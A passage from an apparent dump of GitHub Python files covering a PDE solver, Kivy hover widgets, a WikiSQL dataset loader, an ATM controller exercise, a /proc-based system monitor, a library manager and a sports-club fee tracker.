been applied, so we treat\n y values as eta\n \"\"\"\n y_b_x = 2 * self.tau * (1 - 2 * x)\n m = (1 - 1 / (y_b_x ** 2)) / (self.dx ** 2)\n n = 1 / (self.dy ** 2)\n return (m * (ns['e'] + ns['w']) +\n n * (ns['n'] + ns['s']) -\n self.fs[i, j]) / (2 * m * n)\n else:\n return self.step_func(phi, ns, self.fs[i, j])\n\n\nif __name__ == \"__main__\":\n \"\"\"\n Must have L and N of form 2^p + 1\n \"\"\"\n q, s, r, L, N, tao, w = 2, 3, 1, 65, 65, 0.05, 1.8\n scheme = ModifiedSOR(\n np.zeros((L, N)), np.zeros((L, N)),\n q=q, s=s, r=r, tao=tao, w=w\n )\n u, step = scheme.iteration_loop(sweep_limit=100000)\n # us, vs = scheme.get_derivatives()\n X = np.linspace(-q, s, num=L)\n Y = np.linspace(0, r, num=N)\n [us, vs] = np.gradient(u)\n\n field = plt.figure(1)\n ax1 = field.add_subplot()\n q = ax1.quiver(X, Y, np.transpose(us), np.transpose(vs), np.transpose(u),\n cmap='plasma')\n ax1.set_title('Vector field')\n ax1.set_xlabel('x')\n ax1.set_ylabel('y')\n\n surface = plt.figure(2)\n ax2 = surface.add_subplot(projection='3d')\n Xm, Ym = np.meshgrid(X, Y)\n ax2.plot_surface(Xm, Ym, np.transpose(u), cmap='plasma')\n ax2.set_title('Surface')\n ax2.set_xlabel('x')\n ax2.set_ylabel('y')\n\n u_surface = plt.figure(3)\n ax3 = u_surface.add_subplot(projection='3d')\n ax3.plot_surface(Xm, Ym, np.transpose(us), cmap='plasma')\n ax3.set_title('U_surface')\n ax3.set_xlabel('x')\n ax3.set_ylabel('y')\n\n v_surface = plt.figure(4)\n ax3 = v_surface.add_subplot(projection='3d')\n ax3.plot_surface(Xm, Ym, np.transpose(vs), cmap='plasma')\n ax3.set_title('V_surface')\n ax3.set_xlabel('x')\n ax3.set_ylabel('y')\n\n plt.show()\n","repo_name":"kimizake/PDE-project-2","sub_path":"Proj2_part_3_01345671.py","file_name":"Proj2_part_3_01345671.py","file_ext":"py","file_size_in_byte":2591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7803427263","text":"from kivy.lang import Builder\nfrom kivy.uix.screenmanager import ScreenManager, Screen, NoTransition\nfrom kivy.core.window import Window\nfrom kivy.uix.button import Button\nfrom kivy.uix.textinput import TextInput\nfrom kivy.uix.tabbedpanel import TabbedPanel, TabbedPanelItem\nfrom constants import *\n\n\n##\n# Class: HoverButton extends Button\n# ---------------------------------\n# This class is a button widget that has the ability to change\n# backgrounds when the mouse is hovered over it.\n##\nclass HoverButton(Button):\n # can set a group of buttons to not hover\n # (used for when buttons overlap)\n inactive_group = None\n\n\n ##\n # Class Constructor: __init__\n # ---------------------------\n # This method is called during the creation of the HoverButton object.\n #\n # @params\n # (HoverButton) self This instance of HoverButton\n # (str) button_up Filename of image when button is up (not hovered)\n # (str) button_down Filename of image when button is down (hovered)\n # (str) group Name of button group, used to make button inactive\n ##\n def __init__(self, button_up=BTN_TRANSP[0],\n button_down=BTN_TRANSP[1],\n group = None,\n **kwargs):\n super(HoverButton, self).__init__(**kwargs)\n self.group = group\n self.button_up = button_up\n self.button_down = button_down\n self.background_down = self.button_up\n self.background_normal= self.button_up\n Window.bind(mouse_pos=self.on_mouse_move)\n\n\n ##\n # Class Method: on_mouse_move\n # ---------------------------\n # This method is called whenever the mouse position is changed. This function\n # tracks the position of the mouse and if the mouse is colliding with the widget\n # then the button background is changed to self.button_down. Background is not\n # changed if the instance's group is the inactive group.\n #\n # @params\n # (HoverButton) self This instance of HoverButton\n # (list) *args List of mouse position/movement info\n ##\n def on_mouse_move(self, *args):\n pos = self.to_widget(x=args[1][0], y=args[1][1])\n if self.collide_point(*pos) and \\\n (self.group != HoverButton.inactive_group or \\\n HoverButton.inactive_group == None):\n self.background_normal= self.button_down\n else:\n self.background_normal= self.button_up\n\n\n\n##\n# Class: HoverTab\n# ---------------\n# This class is a TabbedPanelItem whose text becomes brighter whenever\n# the mouse is hovered over it.\n##\nclass HoverTab(TabbedPanelItem):\n ##\n # Class Constructor: __init__\n # ---------------------------\n # This method is called during the creation of the HoverTab object.\n #\n # @params\n # (HoverTab) self This instance of HoverTab\n # (Various) **kwargs Arguments for construction of internal TabbedPanelItem\n ##\n def __init__(self, **kwargs):\n super(HoverTab, self).__init__(**kwargs)\n self.color = (1,1,1,.8)\n Window.bind(mouse_pos=self.on_mouse_move)\n\n ##\n # Class Method: on_mouse_move\n # ---------------------------\n # This method is called whenever the mouse position is changed. This function\n # tracks the position of the mouse and if the mouse is colliding with the widget\n # then the tab text is made brighter.\n #\n # @params\n # (HoverTab) self This instance of HoverTab\n # (list) *args List of mouse position/movement info\n ##\n def on_mouse_move(self, *args):\n pos = self.to_widget(x=args[1][0], y=args[1][1])\n if self.collide_point(*pos) or self.state == 'down':\n self.color = (1,1,1,1)\n else:\n self.color = (1,1,1,.8)\n","repo_name":"davisgomes/FRAG","sub_path":"customwidgets.py","file_name":"customwidgets.py","file_ext":"py","file_size_in_byte":3916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36146897339","text":"from itertools import product\n\n# We are only interested in TMs with a single transition to the halt state\nchoices = [\"00\", \"01\", \"02\", \"03\", \"04\", \"05\",\n \"10\", \"11\", \"12\", \"13\", \"14\", \"15\"]\n\nhalt_state = \"21\"\n\n\ndef generate_tms(filepath, test_function):\n lines = []\n for choice in product(choices, repeat=5):\n choice = list(choice)\n possible_choices = [\"\".join(choice[:i] + [halt_state] + choice[i:])\n for i in range(6)]\n\n lines += [x for x in possible_choices if test_function(x)]\n\n lines = sorted(lines)\n\n with open(filepath, \"w+\") as f:\n f.write(\"\\n\".join(lines))\n","repo_name":"jameshamm/OverloadedBeaver","sub_path":"generate_tms/gen_tms.py","file_name":"gen_tms.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2347281530","text":"\"\"\"A large crowd-sourced dataset for developing natural language interfaces for relational databases\"\"\"\n\nfrom __future__ import absolute_import, division, print_function\n\nimport json\nimport os\n\nimport nlp\n\n\n_CITATION = \"\"\"\\\n@article{zhongSeq2SQL2017,\n author = {Victor Zhong and\n Caiming Xiong and\n Richard Socher},\n title = {Seq2SQL: Generating Structured Queries from Natural Language using\n Reinforcement Learning},\n journal = {CoRR},\n volume = {abs/1709.00103},\n year = {2017}\n}\n\"\"\"\n\n_DESCRIPTION = \"\"\"\\\nA large crowd-sourced dataset for developing natural language interfaces for relational databases\n\"\"\"\n\n_DATA_URL = \"https://github.com/salesforce/WikiSQL/raw/master/data.tar.bz2\"\n\n_AGG_OPS = [\"\", \"MAX\", \"MIN\", \"COUNT\", \"SUM\", \"AVG\"]\n_COND_OPS = [\"=\", \">\", \"<\", \"OP\"]\n\n\nclass WikiSQL(nlp.GeneratorBasedBuilder):\n \"\"\"WikiSQL: A large crowd-sourced dataset for developing natural language interfaces for relational databases\"\"\"\n\n VERSION = nlp.Version(\"0.1.0\")\n\n def _info(self):\n return nlp.DatasetInfo(\n description=_DESCRIPTION,\n features=nlp.Features(\n {\n \"phase\": nlp.Value(\"int32\"),\n \"question\": nlp.Value(\"string\"),\n \"table\": {\n \"header\": nlp.features.Sequence(nlp.Value(\"string\")),\n \"page_title\": nlp.Value(\"string\"),\n \"page_id\": nlp.Value(\"string\"),\n \"types\": nlp.features.Sequence(nlp.Value(\"string\")),\n \"id\": nlp.Value(\"string\"),\n \"section_title\": nlp.Value(\"string\"),\n \"caption\": nlp.Value(\"string\"),\n \"rows\": nlp.features.Sequence(nlp.features.Sequence(nlp.Value(\"string\"))),\n \"name\": nlp.Value(\"string\"),\n },\n \"sql\": {\n \"human_readable\": nlp.Value(\"string\"),\n \"sel\": nlp.Value(\"int32\"),\n \"agg\": nlp.Value(\"int32\"),\n \"conds\": nlp.features.Sequence(\n {\n \"column_index\": nlp.Value(\"int32\"),\n \"operator_index\": nlp.Value(\"int32\"),\n \"condition\": nlp.Value(\"string\"),\n }\n ),\n },\n }\n ),\n # If there's a common (input, target) tuple from the features,\n # specify them here. They'll be used if as_supervised=True in\n # builder.as_dataset.\n supervised_keys=None,\n # Homepage of the dataset for documentation\n homepage=\"https://github.com/salesforce/WikiSQL\",\n citation=_CITATION,\n )\n\n def _split_generators(self, dl_manager):\n \"\"\"Returns SplitGenerators.\"\"\"\n dl_dir = dl_manager.download_and_extract(_DATA_URL)\n dl_dir = os.path.join(dl_dir, \"data\")\n\n return [\n nlp.SplitGenerator(\n name=nlp.Split.TEST,\n gen_kwargs={\n \"main_filepath\": os.path.join(dl_dir, \"test.jsonl\"),\n \"tables_filepath\": os.path.join(dl_dir, \"test.tables.jsonl\"),\n },\n ),\n nlp.SplitGenerator(\n name=nlp.Split.VALIDATION,\n gen_kwargs={\n \"main_filepath\": os.path.join(dl_dir, \"dev.jsonl\"),\n \"tables_filepath\": os.path.join(dl_dir, \"dev.tables.jsonl\"),\n },\n ),\n nlp.SplitGenerator(\n name=nlp.Split.TRAIN,\n gen_kwargs={\n \"main_filepath\": os.path.join(dl_dir, \"train.jsonl\"),\n \"tables_filepath\": os.path.join(dl_dir, \"train.tables.jsonl\"),\n },\n ),\n ]\n\n def _convert_to_human_readable(self, sel, agg, columns, conditions):\n \"\"\"Make SQL query string. Based on https://github.com/salesforce/WikiSQL/blob/c2ed4f9b22db1cc2721805d53e6e76e07e2ccbdc/lib/query.py#L10\"\"\"\n\n rep = \"SELECT {agg} {sel} FROM table\".format(\n agg=_AGG_OPS[agg], sel=columns[sel] if columns is not None else \"col{}\".format(sel)\n )\n\n if conditions:\n rep += \" WHERE \" + \" AND \".join([\"{} {} {}\".format(columns[i], _COND_OPS[o], v) for i, o, v in conditions])\n return \" \".join(rep.split())\n\n def _generate_examples(self, main_filepath, tables_filepath):\n \"\"\"Yields examples.\"\"\"\n\n # Build dictionary to table_ids:tables\n with open(tables_filepath) as f:\n tables = [json.loads(line) for line in f]\n id_to_tables = {x[\"id\"]: x for x in tables}\n\n with open(main_filepath) as f:\n for idx, line in enumerate(f):\n row = json.loads(line)\n row[\"table\"] = id_to_tables[row[\"table_id\"]]\n del row[\"table_id\"]\n\n # Handle missing data\n row[\"table\"][\"page_title\"] = row[\"table\"].get(\"page_title\", \"\")\n row[\"table\"][\"section_title\"] = row[\"table\"].get(\"section_title\", \"\")\n row[\"table\"][\"caption\"] = row[\"table\"].get(\"caption\", \"\")\n row[\"table\"][\"name\"] = row[\"table\"].get(\"name\", \"\")\n row[\"table\"][\"page_id\"] = str(row[\"table\"].get(\"page_id\", \"\"))\n\n # Fix row types\n row[\"table\"][\"rows\"] = [[str(e) for e in r] for r in row[\"table\"][\"rows\"]]\n\n # Get human-readable version\n row[\"sql\"][\"human_readable\"] = self._convert_to_human_readable(\n row[\"sql\"][\"sel\"], row[\"sql\"][\"agg\"], row[\"table\"][\"header\"], row[\"sql\"][\"conds\"],\n )\n\n # Restructure sql->conds\n # - wikiSQL provides a tuple [column_index, operator_index, condition]\n # as 'condition' can have 2 types (float or str) we convert to dict\n for i in range(len(row[\"sql\"][\"conds\"])):\n row[\"sql\"][\"conds\"][i] = {\n \"column_index\": row[\"sql\"][\"conds\"][i][0],\n \"operator_index\": row[\"sql\"][\"conds\"][i][1],\n \"condition\": str(row[\"sql\"][\"conds\"][i][2]),\n }\n yield idx, row\n","repo_name":"MachineLearningBCAM/Minimax-risk-classifiers-NeurIPS-2020","sub_path":"venv/lib/python3.6/site-packages/nlp/datasets/wikisql/46eb569a3cc9ef4b2b9505b938564a4855d92f6ed051c7176b41d9ea2eec0180/wikisql.py","file_name":"wikisql.py","file_ext":"py","file_size_in_byte":6443,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"20317519706","text":"import random\n\nclass Woori:\n def __init__(self):\n self.data_dict = {}\n\n\n def new_acc(self, card_no, account, amt):\n if card_no in self.data_dict:\n self.data_dict[card_no][\"account\"][account] = amt\n\n def new_card(self, card_no, paswd, account, amt):\n self.data_dict[card_no] = { \"account\": {account: amt},\"pin\": paswd}\n\n def passwd_check(self, card_num, entered_pin):\n if card_num in self.data_dict and self.data_dict[card_num][\"pin\"] == entered_pin:\n return self.data_dict[card_num][\"account\"]\n else:\n return None\n\n def update_account(self, card_num, account, amt):\n if self.data_dict[card_num][\"account\"][account] in self.data_dict[card_num][\"account\"]:\n self.data_dict[card_num][\"account\"][account] = amt\n return True\n else:\n return False\n\n\nclass Controller:\n def __init__(self, bank, cash):\n self.accounts = None\n self.Woori = bank\n self.cash_bin = cash\n\n def insert_card(self, card_num, pin):\n self.accounts = self.Woori.passwd_check(card_num, pin)\n if self.accounts != None:\n return 1, \"Welcome!\" \n else:\n return 0, \"Invalid card or wrong password\"\n\n def acc_selection(self, acc):\n if acc in self.accounts:\n return True\n else:\n return False\n\n def account_actions(self, card_num, acc, action, amt=0):\n if action == \"See Balance\":\n return self.accounts[acc], 1,0\n elif action == \"Withdraw\":\n if self.cash_bin >= amt and self.accounts[acc] >= amt:\n updated_balance = self.accounts[acc] - amt\n self.cash_bin = self.cash_bin - amt\n self.accounts[acc] = updated_balance\n self.Woori.update_account(card_num, acc, updated_balance)\n return self.accounts[acc], 1, 0\n elif self.cash_bin < amt:\n return self.accounts[acc], 0 , 1\n elif self.accounts[acc] < amt:\n return self.accounts[acc], 0 , 2\n elif action == \"Deposit\":\n updated_balance = self.accounts[acc] + amt\n self.cash_bin = self.cash_bin + amt\n self.accounts[acc] = updated_balance\n self.Woori.update_account(card_num, acc, updated_balance)\n return self.accounts[acc], 1,0\n else:\n return self.accounts[acc], 2,0\n\n def __call__(self, card_num, pin, acc, action_list):\n a, b = self.insert_card(card_num, pin)\n if a == 0:\n return \"Invalid card or wrong password\"\n check = self.acc_selection(acc)\n if check is False:\n return \"Invalid Account!\"\n for action in action_list:\n if action[0] == \"Leave\":\n return \"Left successfully\"\n balance, bit, bit1 = self.account_actions(card_num, acc, action[0], action[1])\n if bit == 0:\n continue\n elif bit == 2:\n return \"Invalid operation\"\n else:\n continue\n return \"Operations completed\"\n\n\nif __name__ == \"__main__\":\n\n\n empty_bank = Woori()\n # Test Controller on Empty Woori\n empty_atm = Controller(empty_bank, 0)\n valid, message = empty_atm.insert_card(0, 0)\n if valid == 0:\n print(\"Test Invalid Message on Empty ATM \\t SUCCESS\")\n else:\n print(\"Test Invalid Message on Empty ATM \\t FAILURE\")\n\n # New bank for teting\n\n test_bank = Woori()\n test_bank.new_card(20202021, 1234, \"checking\", 1000)\n test_bank.new_acc(20202021, \"savings\", 1000)\n test_bank.new_card(20192020, 4860, \"checking\", 5000)\n test_atm = Controller(test_bank, 10000)\n operations = [ (\"Withdraw\", 40),(\"See Balance\", 0), (\"Deposit\", 100), (\"Withdraw\", 1000) ]\n\n # Testing the ATM with valid sequence of operations\n if test_atm(20192020, 4860, \"checking\", operations) == \"Operations completed\":\n print(\"Test Valid ATM Check \\t SUCCESS\")\n else:\n print(\"Test Valid ATM Check \\t FAILURE\")\n\n # Testing if overdraft is handled correclty\n if test_atm(20202021, 1234, \"checking\", operations) == \"Operations completed\":\n print(\"Test Overdraft handling \\t SUCCESS\")\n else:\n print(\"Test Overdraft handling \\t FAILURE\")\n\n # Test invalid PIN number\n if test_atm(20192020, 9878, \"checking\", operations) == \"Invalid card or wrong password\":\n print(\"Test Incorrect password \\t SUCCESS\")\n else:\n print(\"Test Incorrect password \\t FAILURE\")\n\n # Test invalid Account no\n if test_atm(876504321, 1234, \"checking\", operations) == \"Invalid card or wrong password\":\n print(\"Test Invalid Account Number \\t SUCCESS\")\n else:\n print(\"Test Invalid Account Number \\t FAILURE\")\n\n test_bank2 = Woori()\n test_bank2.new_card(20202021, 1234, \"checking\", 1000)\n test_bank2.new_acc(20202021, \"savings\", 1000)\n test_bank2.new_card(20192020, 4860, \"checking\", 5000)\n test_atm2 = Controller(test_bank2, 10000)\n cash_bin_over_action = [(\"See Balance\", 0), (\"Withdraw\", 30000)]\n\n # Tests cash bin excess handling on account balance\n if test_atm(20192020, 4860, \"checking\", cash_bin_over_action) == \"Operations completed\":\n print(\"Test Exceeding Cash Bin \\t SUCCESS\")\n else:\n print(\"Test Exceeding Cash Bin \\t FAILURE\")\n\n exit_action = [(\"See Balance\", 0), (\"Leave\", 0)]\n if test_atm(20192020, 4860, \"checking\", exit_action) == \"Left successfully\":\n print(\"Test exiting \\t SUCCESS\")\n else:\n print(\"Test exiting \\t FAILURE\")\n\n test_bank = Woori()\n card_num = 20180821\n test_bank.new_card(card_num, 1234, \"stipend\", 20000)\n test_bank.new_acc(card_num, \"savings\", 15000)\n test_atm = Controller(test_bank, 10000)\n\n #while True:\n pin = int(input(\"\\n Please Enter Your account pin: \"))\n a, b = test_atm.insert_card(card_num, pin)\n while a == 0:\n pin = int(input(\"\\nInvalid Pin.. Re-enter your Pin please: \"))\n a, b = test_atm.insert_card(card_num, pin)\n print(\"\\nSelect Account:\")\n print(\"\\n1 - Savings \\t 2 - Stipend\")\n temp = int(input(\"\\nEnter your selection: \"))\n account= \"none\"\n if temp == 1:\n account = \"savings\"\n if temp == 2:\n account = \"stipend\"\n\n while True:\n print(\"\\n1 - Balance \\t 2 - Withdraw \\t 3 - Deposit \\t 4 - Quit \")\n selection = int(input(\"\\nEnter your selection: \"))\n if selection == 1:\n balance, void, void1 = test_atm.account_actions(card_num, account, \"See Balance\")\n print(\"Your Balance is: \" + str(balance) +\" KRW\")\n if selection==2:\n balance, void, void1 = test_atm.account_actions(card_num, account, \"See Balance\")\n print(\"Your Balance is: \" + str(balance)+\" KRW\")\n amt = int(input(\"\\nPlease Enter amount to withdraw: \"))\n balance, void, void1 = test_atm.account_actions(card_num, account, \"Withdraw\",amt)\n if void==0 and void1==2:\n print(\"Please enter a valid amount\")\n if void==0 and void1==1:\n print(\"There is not enough cash in the ATM\")\n balance, void, void1 = test_atm.account_actions(card_num, account, \"See Balance\")\n print(\"Your Balance is: \" + str(balance)+\" KRW\")\n if selection==3:\n amt = int(input(\"\\nEnter an amount to deposit: \"))\n test_atm.account_actions(card_num, account, \"Deposit\", amt)\n balance, void, void1 = test_atm.account_actions(card_num, account, \"See Balance\")\n print(\"Your Balance is: \" + str(balance)+\" KRW\")\n if selection == 4:\n flag = input(\"Are you sure you want to quit?, Yes, or No:\")\n if flag.lower() == \"yes\":\n print(\"\\nYour Transaction is complete\")\n print(\"Transaction number: \", random.randint\n (10000, 1000000))\n print(\"Thanks for choosing us as your bank\")\n break\n","repo_name":"abbasly/Simple_ATM_Controller","sub_path":"atmCont.py","file_name":"atmCont.py","file_ext":"py","file_size_in_byte":8014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32513987778","text":"# Exercise Question 1: Create a Vehicle class with name of vehicle,\n# max_speed and mileage instance attributes\n\nclass Vehicle:\n def __init__(self,name, max_speed, mileage):\n self.name=name\n self.max_speed = max_speed\n self.mileage = mileage\n\nvehicle1 = Vehicle(\"Volvo\",240, 18)\nprint(vehicle1.max_speed, vehicle1.mileage)","repo_name":"QAMilestoneAcademy/python_basic","sub_path":"Class20-21-22-23-24-objectoriented/Excercise_ObjectOriented/excercise_1.py","file_name":"excercise_1.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31295778241","text":"#!/usr/bin/env python\nfrom __future__ import print_function\nfrom collections import OrderedDict\nimport pprint\nimport sys, time\n\ndef CPUinfo():\n ''' Return the information in /proc/CPUinfo\n as a dictionary in the following format:\n CPU_info['proc0']={...}\n CPU_info['proc1']={...}\n '''\n CPUinfo=OrderedDict()\n procinfo=OrderedDict()\n\n nprocs = 0\n with open('/proc/cpuinfo') as f:\n for line in f:\n if not line.strip():\n # end of one processor\n CPUinfo['proc%s' % nprocs] = procinfo\n nprocs=nprocs+1\n # Reset\n procinfo=OrderedDict()\n else:\n if len(line.split(':')) == 2:\n procinfo[line.split(':')[0].strip()] = line.split(':')[1].strip()\n else:\n procinfo[line.split(':')[0].strip()] = ''\n\n return CPUinfo\n\n\ndef load_stat():\n loadavg = {}\n f = open(\"/proc/loadavg\")\n con = f.read().split()\n f.close()\n loadavg['lavg_1']=con[0]\n loadavg['lavg_5']=con[1]\n loadavg['lavg_15']=con[2]\n loadavg['nr']=con[3]\n loadavg['last_pid']=con[4]\n return loadavg\n\ndef meminfo():\n ''' Return the information in /proc/meminfo\n as a dictionary '''\n meminfo=OrderedDict()\n\n with open('/proc/meminfo') as f:\n for line in f:\n meminfo[line.split(':')[0]] = line.split(':')[1].strip()\n return meminfo\n\ndef rx(STATS):\n ifstat = open('/proc/net/dev').readlines()\n for interface in ifstat:\n if INTERFACE in interface:\n stat = float(interface.split()[1])\n STATS[0:] = [stat]\n\ndef tx(STATS):\n ifstat = open('/proc/net/dev').readlines()\n for interface in ifstat:\n if INTERFACE in interface:\n stat = float(interface.split()[9])\n STATS[1:] = [stat]\n\n\n\n\nif __name__=='__main__':\n\n if len(sys.argv) > 1:\n INTERFACE = sys.argv[1]\n else:\n INTERFACE = 'eth0'\n STATS = []\n print ('Interface:',INTERFACE)\n\n print ('In Out')\n rx(STATS)\n tx(STATS)\n\n while True:\n time.sleep(1)\n rxstat_o = list(STATS)\n rx(STATS)\n tx(STATS)\n RX = float(STATS[0])\n RX_O = rxstat_o[0]\n TX = float(STATS[1])\n TX_O = rxstat_o[1]\n RX_RATE = round((RX - RX_O)/1024/1024,3)\n TX_RATE = round((TX - TX_O)/1024/1024,3)\n\n print(RX_RATE ,'MB ',TX_RATE ,'MB')\n CPUinfo = CPUinfo()\n for processor in CPUinfo.keys():\n print(CPUinfo[processor]['model name'])\n\n print(\"loadavg: \", load_stat()['lavg_15'])\n\n meminfo = meminfo()\n print('Total memory: {0}'.format(meminfo['MemTotal']))\n print('Free memory: {0}'.format(meminfo['MemFree']))\n","repo_name":"dycforever/program","sub_path":"python_prog/monitors.py","file_name":"monitors.py","file_ext":"py","file_size_in_byte":2746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13022799229","text":"from extensions.ops.interpolate import Interpolate\nfrom mo.front.common.partial_infer.utils import int64_array\nfrom mo.front.extractor import FrontExtractorOp\n\n\nclass ResizeBilinearFrontExtractor(FrontExtractorOp):\n op = 'ResizeBilinear'\n enabled = True\n\n @classmethod\n def extract(cls, node):\n mapping_rule = {\n 'pads_begin': 0,\n 'pads_end': 0,\n 'align_corners': int(node.pb.attr['align_corners'].b),\n 'mode': 'linear',\n 'axes': int64_array([1, 2]),\n }\n Interpolate.update_node_stat(node, mapping_rule)\n return cls.enabled\n","repo_name":"Namptiter/OpenVINO-Darknet-YOLOv3","sub_path":"model_optimizer/extensions/front/tf/resize_bilinear.py","file_name":"resize_bilinear.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"30990565526","text":"import json\nimport os\nimport sys\nfrom classes.Library import *\n\n\ndef add_book(libr):\n author = input(\"Enter the author's name: \")\n title = input(\"Enter the book's title: \")\n num_of_pages = int(input(\"Enter the number of pages: \"))\n res = libr.add_new_book({\"author\": author, \"title\": title,\n \"num_of_pages\": num_of_pages})\n print(f\"The book was {'' if res else 'not'} added\")\n\n\ndef delete_book(libr):\n title = input(\"Enter the book's title: \")\n res = libr.delete_book(title)\n print(f\"The book was {'' if res else 'not'} deleted\")\n\n\ndef switch_book(libr):\n title1 = input(\"Enter the first book's title: \")\n title2 = input(\"Enter the second book's title: \")\n res = libr.change_locations(title1, title2)\n print(f\"The books were {'' if res else 'not'} switched\")\n\n\ndef add_reader(libr):\n id = input(\"Enter the reader's id: \")\n name = input(\"Enter the reader's name: \")\n libr.register_reader(id, name)\n print(\"The reader was registered\")\n\n\ndef remove_reader(libr):\n name = input(\"Enter the reader's name: \")\n res = libr.remove_reader(name)\n print(f\"The reader was {'' if res else 'not'} deleted\")\n\n\ndef search_author(libr):\n name = input(\"Enter the author's name: \")\n results = libr.search_by_author(name)\n print(results)\n\n\ndef read_book(libr):\n title = input(\"Enter the book's title: \")\n name = input(\"Enter the reader's name: \")\n res = libr.reader_read_book(title, name)\n print(\n f\"The book was {'' if res else 'not'} added to the reader's read list\")\n\n\ndef sort_books(libr):\n libr.order_books()\n print(\"The books were sorted\")\n\n\ndef save_data(libr):\n with open('data.json', 'w') as f:\n obj = {\"shelves\": [], \"readers\": []}\n for shelf in libr.shelves:\n sh = {}\n sh[\"is_shelf_full\"] = shelf.is_shelf_full\n sh[\"books\"] = [book.__dict__ for book in shelf.books]\n obj[\"shelves\"].append(sh)\n for reader in libr.readers:\n rdr = {}\n rdr[\"id\"] = reader.id\n rdr[\"name\"] = reader.name\n rdr[\"books\"] = reader.books\n obj[\"readers\"].append(rdr)\n json.dump(obj, f, indent=4)\n print(\"The data was saved\")\n\n\ndef load_data():\n with open(os.path.join(sys.path[0], \"data.json\"), \"r\") as f:\n data = json.load(f)\n # print(data)\n\n libr = Library()\n for i, shelf in enumerate(data[\"shelves\"]):\n libr.shelves[i].is_shelf_full = shelf[\"is_shelf_full\"]\n libr.shelves[i].books = []\n for book in shelf[\"books\"]:\n libr.shelves[i].add_book(book)\n for reader in data[\"readers\"]:\n libr.register_reader(reader[\"id\"], reader[\"name\"])\n for i, book in enumerate(reader[\"books\"]):\n libr.reader_read_book(\n reader[\"books\"][i][\"title\"], reader[\"name\"])\n print(\"The data was loaded\")\n return libr\n","repo_name":"s-e1/LibraryProject","sub_path":"utilities/input_functions.py","file_name":"input_functions.py","file_ext":"py","file_size_in_byte":2954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32067151942","text":"class Local:\n # Atributos de la clase\n calle = \"\"\n numero = 0\n color = \"\"\n\n # Constructor de la clase\n def __init__(self, calle, numero, color):\n self.calle = calle\n self.numero = numero\n self.color = color\n\n# Preguntar al usuario si desea crear un local\ncrear_local = input(\"¿Desea crear un nuevo local? (s/n)\")\n\n# Si el usuario responde \"s\", pedir los datos para crear el local\nif crear_local == \"s\":\n calle = input(\"Ingrese la calle del local: \")\n numero = int(input(\"Ingrese el número del local: \"))\n color = input(\"Ingrese el color del local: \")\n \n # Crear una nueva instancia de la clase Local con los datos ingresados\n local_1 = Local(calle, numero, color)\n print(\"El local se ha creado exitosamente.\")\nelse:\n print(\"No se ha creado ningún local.\")\n","repo_name":"Lucasdipa04/Tp-algortmos2","sub_path":"class-chatgpt.py","file_name":"class-chatgpt.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"19309732886","text":"import os\nimport pickle\nfrom registro_c import *\nDEPORTE = 'Natacion', 'Basquet', 'Karate', 'Futbol', 'Patin' \n\n\ndef menu():\n print('')\n print('1.')\n print('2.')\n print('3.')\n print('4.')\n print('')\n return int(input('Ingrese una opcion: '))\n\n\ndef obtener_vector(fd):\n if not os.path.exists(fd):\n print('No existe el archivo!')\n return\n \n vec_socios = []\n m = open( fd, 'rb')\n while m.tell() < os.path.getsize(fd):\n vec_socios.append(pickle.load(m)) \n m.close()\n \n return vec_socios\n \n\ndef mostrar_vector(v):\n for socio in v:\n print(socio)\n\n\ndef buscar_socio(v, socio, deporte):\n for i in range(len(v)):\n if v[i].socio == socio and v[i].deporte == deporte:\n return i\n return -1\n\n\ndef generar_morosos(v,fd): \n m = open(fd, 'wt')\n for socio in v:\n if socio.dia == 0:\n m.write(socio.a_csv() + \"\\n\")\n m.close()\n\ndef modificar_agregar_socio(v, i, socio, deporte): \n dia = int(input('Ingrese el dia: '))\n pago = int(input('Ingrese el valor de pago: '))\n if i != -1:\n v[i].dia = dia\n v[i].pago = pago\n return 'Se modifico el dia a ' + str(dia) + ' y el valor de pago a ' + str(pago)\n \n else:\n posicion = DEPORTE.index(deporte)\n v.append(Cuota(socio,posicion,dia,pago))\n return 'Se agrego un nuevo socio al registro'\n\n\ndef determinar_total_por_deporte(v):\n vec_acum = 5*[0]\n \n for socio in v:\n vec_acum[socio.deporte] += socio.valor_cuota\n\n print('\\nEl total por deporte es: ')\n for i in range(len(vec_acum)):\n print(DEPORTE[i] + ': $' + str(vec_acum[i]))\n\n\ndef determinar_participante_por_deporte(v):\n vec_cont = 5*[0]\n \n for socio in v:\n vec_cont[socio.deporte] += 1\n \n mayor = max(vec_cont)\n indice = vec_cont.index(mayor)\n \n print('El deporte con mas participantes es', DEPORTE[indice], 'con', mayor, 'participantes')\n\n\ndef grabar_vector(vec, fd):\n\n m = open(fd, 'wb')\n for registro in vec:\n pickle.dump(registro, m)\n m.close\n \n \n\ndef principal():\n while True:\n op = menu()\n \n if op == 1:\n vec = obtener_vector('cuotas.dat')\n mostrar_vector(vec)\n \n elif op == 2:\n socio = int(input('Ingrese el socio a buscar:'))\n deporte = input('Ingrese el deporte a buscar:')\n indice = buscar_socio(vec, socio, deporte)\n respuesta = modificar_agregar_socio(vec, indice, socio, deporte)\n print(respuesta)\n \n elif op == 3:\n generar_morosos(vec, 'morosos.csv')\n print('Se genero un documento con los morosos!')\n elif op == 4:\n determinar_total_por_deporte(vec)\n determinar_participante_por_deporte(vec)\n elif op == 5:\n grabar_vector(vec, 'cuotas.dat')\n print('Se guardaron los cambios en cuotas.dat')\n \n\n\nif __name__ == '__main__':\n 